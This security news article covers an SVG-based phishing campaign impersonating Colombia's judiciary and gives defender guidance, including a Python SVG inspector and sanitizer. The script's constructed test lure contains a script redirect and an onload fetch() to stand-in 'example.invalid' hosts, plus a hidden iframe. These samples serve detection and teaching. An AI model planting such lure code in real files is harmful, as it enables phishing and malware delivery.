SVG-based phishing campaign impersonates Colombian judiciary to deliver malware
The campaign: what VirusTotal uncovered
Security researchers at VirusTotal have identified a phishing campaign that hides malicious content inside Scalable Vector Graphics (SVG) files. The SVGs are designed to render convincing portal pages that impersonate Colombia’s judicial system, and they act as delivery mechanisms for malware.
VirusTotal’s analysis shows attackers embedding active content in SVG files to present realistic-looking portals that prompt victims to interact and ultimately download or execute malicious payloads.
The campaign highlights a growing preference among attackers for non-traditional attachment and hosting formats that can evade simple signature- and extension-based defenses. By using SVGs, the threat actors can present a page-like experience within an image file and use that surface to phish credentials or initiate secondary stages that deploy malware.
Why SVG files matter as an attack vector
SVG is an XML-based vector image format that supports features not available in raster formats such as PNG or JPEG. Because an SVG is text/XML, it can carry hyperlinks, CSS, `<script>` elements, event-handler attributes (`onload`, `onclick`, and so on), references to external resources, and, via `<foreignObject>`, embedded XHTML. Whether that content actually executes depends on how the file is loaded: browsers treat an SVG referenced from an `<img>` tag as an inert picture, but run its scripts when the file is opened directly as a document or embedded with `<object>` or `<iframe>`. That flexibility makes SVG useful for legitimate web design but also attractive to attackers.
- Allowed by many gateways: Email and web gateways frequently allow image formats while blocking executable formats, so attackers use image types to bypass coarse filtering.
- Renderable as a page: When rendered in a browser or certain viewers, an SVG can display styled content that resembles a web form or portal page, increasing the credibility of a phishing lure.
- Obfuscatable content: Because SVGs are text-based, attackers can obfuscate HTML-like content, embed data URIs, or encode payload stagers inside the file to complicate static analysis.
These characteristics make SVGs a convenient carrier for social-engineering lures and for initiating follow-on steps that fetch or execute malware — a pattern VirusTotal observed in the campaign targeting Colombia’s judicial system.
Operational analysis and detection challenges (expert perspective)
For defenders, SVG-based campaigns present a mix of detection and response challenges. The following analysis highlights practical technical factors and inspection strategies that practitioners should consider.
- Extension vs. content: Gateways that rely solely on file extensions or MIME types can be bypassed. An attacker can rename files or set benign MIME types while the payload contains XML with active elements.
- Static-analysis blind spots: Traditional AV engines that focus on PE/ELF signatures miss malicious behavior embedded in XML. Attackers can also use base64-encoded blobs or compressed data inside SVGs to conceal payloads.
- Rendering-dependent behavior: Whether an SVG executes active content depends on the renderer (browser, viewer, email client) and on how the file is loaded. The same file that is inert as an inline `<img>` in an email client becomes a full scriptable document when the user opens it directly in a browser or in an external viewer, so analysis must cover the context the victim is actually steered into, not just the preview.
- Hosting and delivery: Attackers frequently host malicious SVGs on legitimate-looking infrastructure or cloud storage to reduce suspicion. They may also distribute SVGs as attachments, links to hosted files, or embedded resources on compromised sites.
Detection and mitigation should therefore combine content inspection, sandbox execution, and runtime telemetry rather than relying solely on signature matching.
Comparable incidents and industry context
The use of non-traditional file formats and hosting mechanisms to deliver phishing lures or malware is consistent with broader trends observed across the threat landscape.
- Phishing remains one of the primary initial access vectors in many breach reports and industry studies, which frequently note attackers’ continual adaptation to bypass defensive controls.
- Attackers have previously weaponized other file formats — such as HTML attachments, ISO files, LNK shortcuts, and even Microsoft Office documents with embedded web content — to present interactive lures while avoiding detection.
- Security communities and vendors have repeatedly warned that XML-based formats (including SVG and certain Office XML packages) can carry active or obfuscated content and should be treated with increased scrutiny.
VirusTotal’s discovery fits into this pattern: adversaries iteratively move to formats that blend legitimate use with the ability to host interactive, obfuscated, or scriptable content.
Actionable recommendations for defenders
Organizations should treat the rise of SVG-based phishing as a prompt to harden attachment handling, enhance inspection pipelines, and refine incident response procedures. Practical steps include:
- Harden mail gateways and file policies
- Block or quarantine SVG attachments by default where business needs don’t require them.
- Validate content, not just labels: a declared MIME type or extension is attacker-controlled. Parse the file and drop anything whose actual content does not match (an .svg that is not well-formed XML with an `svg` root element, or a file declared as an image that actually carries an HTML document).
- Strip or sanitize active content in inbound files: remove scripts, external references, and data URIs where possible.
- Improve content inspection and sandboxing
- Apply static parsing to detect XML elements and attributes commonly abused for interactivity (script elements, inline event handlers, `foreignObject`, and `href`/`src` values that point to external hosts, `javascript:` URIs, or non-image data URIs).
- Feed suspicious SVGs into a dynamic sandbox that can render the file and observe network activity, attempted downloads, or suspicious DOM manipulations.
- Harden endpoints and browsers
- Ensure browsers and image viewers are patched. Where your own applications serve user-supplied SVGs, deliver them with a restrictive Content-Security-Policy (for example `script-src 'none'`) and `Content-Disposition: attachment`, or reference them only through `<img>`, so the file cannot run as an inline document.
- Configure EDR/endpoint controls to monitor processes spawned by unexpected renderers or to block the download of executables initiated by document or image renderers.
- Hunt and alert
- Create detection rules and YARA signatures that flag SVGs containing script tags, inline event handlers, data URI payloads, or unusually long base64 sections.
- Hunt for network indicators such as connections to newly registered domains, cloud storage links delivering SVG files, or anomalous GET requests for .svg resources.
- User training and operational controls
- Educate users to treat unexpected attachments — even images — with suspicion, especially those purporting to be official portals or requesting credentials and downloads.
- Implement technical controls for high-risk communication channels (e.g., require secure portals for official notices rather than email attachments).
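As an added example (not code from VirusTotal, BleepingComputer, or the campaign analysis), the following Python script implements three of the steps above in one place: the static parsing that looks for script elements, event handlers, `foreignObject` and suspicious `href`/`src` values, the indicator counts a hunting rule would key on (including long base64 runs), and the sanitization step that strips that content while keeping the vector drawing and any embedded raster image. It uses only the standard library. The two SVG samples, the `example.invalid` URLs and the allow/review/quarantine policy are constructed for illustration and are not indicators from the campaign.

```python
"""Static inspection and sanitisation of SVG attachments (standard library only).

Added example; the samples and policy below are constructed, not campaign data.
"""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)        # serialise with a clean default namespace
ET.register_namespace("xlink", XLINK_NS)

# Elements that turn an "image" into an active document when opened directly.
ACTIVE_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object"}
URI_ATTRS = {"href", "src"}              # plain href, xlink:href and src
LONG_BASE64 = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")
ENTITY_DECL = re.compile(rb"<!ENTITY\b")


def _local(name):
    """Strip the {namespace} prefix ElementTree puts on tags and attribute names."""
    return name.rsplit("}", 1)[-1]


def _classify_uri(element_name, value):
    v = value.strip().lower()
    if v.startswith("javascript:"):
        return "javascript_uri"
    if v.startswith("data:"):
        # Embedded raster images on <image> are common in legitimate exports.
        if element_name == "image" and v.startswith("data:image/"):
            return "raster_data_uri"
        return "other_data_uri"
    if v.startswith(("http:", "https:", "//")):
        return "external_ref"
    return None


def inspect_svg(data):
    """Count indicators in one SVG; raises ET.ParseError on non-XML input.

    ElementTree does not fetch external entities, but a real gateway should use an
    entity-expansion-hardened parser (e.g. defusedxml) in place of ET.fromstring.
    """
    keys = ["script", "active_element", "event_handler", "javascript_uri",
            "external_ref", "other_data_uri", "raster_data_uri", "entity_decl",
            "long_base64"]
    findings = dict.fromkeys(keys, 0)
    findings["entity_decl"] = len(ENTITY_DECL.findall(data))
    findings["long_base64"] = len(LONG_BASE64.findall(data.decode("utf-8", "ignore")))
    for el in ET.fromstring(data).iter():
        name = _local(el.tag)
        if name == "script":
            findings["script"] += 1
        elif name in ACTIVE_ELEMENTS:
            findings["active_element"] += 1
        for attr, value in el.attrib.items():
            aname = _local(attr).lower()
            if aname.startswith("on"):              # onload, onclick, ...
                findings["event_handler"] += 1
            elif aname in URI_ATTRS:
                kind = _classify_uri(name, value)
                if kind:
                    findings[kind] += 1
    return findings


def verdict(findings):
    """Constructed policy: anything executable is quarantined, anything that reaches
    out or smuggles a non-image payload is reviewed, plain drawings are allowed."""
    if any(findings[k] for k in ("script", "active_element", "event_handler", "javascript_uri")):
        return "quarantine"
    if any(findings[k] for k in ("external_ref", "other_data_uri", "entity_decl")):
        return "review"
    return "allow"


def sanitize_svg(data):
    """Return the SVG with active elements, event handlers and outbound or non-image
    URIs removed. Vector content and embedded raster <image> data URIs survive."""
    root = ET.fromstring(data)
    parents = {child: parent for parent in root.iter() for child in parent}
    for el in list(root.iter()):               # snapshot: we mutate the tree below
        name = _local(el.tag)
        if name in ACTIVE_ELEMENTS and el in parents:
            parents[el].remove(el)             # drops the subtree, script text included
            continue
        for attr in list(el.attrib):
            aname = _local(attr).lower()
            bad_uri = aname in URI_ATTRS and _classify_uri(
                name, el.attrib[attr]) not in (None, "raster_data_uri")
            if aname.startswith("on") or bad_uri:
                del el.attrib[attr]
    return ET.tostring(root, encoding="utf-8")


# Constructed lure in the judiciary-portal theme; example.invalid never resolves.
LURE_SVG = (
    b'<?xml version="1.0" encoding="UTF-8"?>\n'
    b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" '
    b'width="800" height="600">\n'
    b'  <rect width="800" height="600" fill="#fff"/>\n'
    b'  <text x="40" y="60" font-size="24">Portal judicial - notificaciones</text>\n'
    b'  <a xlink:href="https://example.invalid/descarga">\n'
    b'    <rect x="40" y="150" width="240" height="50" fill="#004b8d"/>\n'
    b'    <text x="60" y="182" fill="#fff">Descargar notificacion</text>\n'
    b'  </a>\n'
    b'  <image x="700" y="20" width="64" height="64" href="data:image/png;base64,'
    + b"A" * 256 + b'"/>\n'
    b'  <script>location = atob("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvc3RhZ2U=");</script>\n'
    b'  <foreignObject width="1" height="1">\n'
    b'    <iframe xmlns="http://www.w3.org/1999/xhtml" '
    b'src="data:text/html;base64,PGgxPmhpPC9oMT4="></iframe>\n'
    b'  </foreignObject>\n'
    b'  <rect width="1" height="1" onload="fetch(\'https://example.invalid/beacon\')"/>\n'
    b'</svg>\n'
)

# Constructed benign drawing for comparison.
BENIGN_SVG = (
    b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">\n'
    b'  <circle cx="50" cy="50" r="40" fill="#004b8d"/>\n'
    b'  <text x="30" y="55">OK</text>\n'
    b'</svg>\n'
)

if __name__ == "__main__":
    for label, blob in (("lure", LURE_SVG), ("benign", BENIGN_SVG)):
        f = inspect_svg(blob)
        print(label, verdict(f), {k: v for k, v in f.items() if v})
    print(sanitize_svg(LURE_SVG).decode())
```

Run as a script it prints `lure quarantine` with the per-indicator counts, `benign allow`, and the stripped lure: the script, the `foreignObject` with its hidden iframe, the `onload` handler and the outbound link are gone, while the embedded PNG on the `<image>` element is kept. The raster exception is the kind of nuance a blanket "drop all data URIs" rule misses; the separate `review` tier exists so that outbound links, which many legitimate SVGs also contain, are not silently blocked but are logged for hunting.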
Conclusion
VirusTotal’s findings underscore a simple but persistent reality: attackers will exploit any format that can plausibly bypass filters and convince a user to act. SVG files, because they are text-based and capable of displaying page-like content, are increasingly attractive for phishing campaigns that aim to deliver malware. Defenders should treat SVGs as potentially active content, augment inspection and sandboxing capabilities, and tighten attachment policies and user-facing procedures to reduce the risk of compromise.
Source: www.bleepingcomputer.com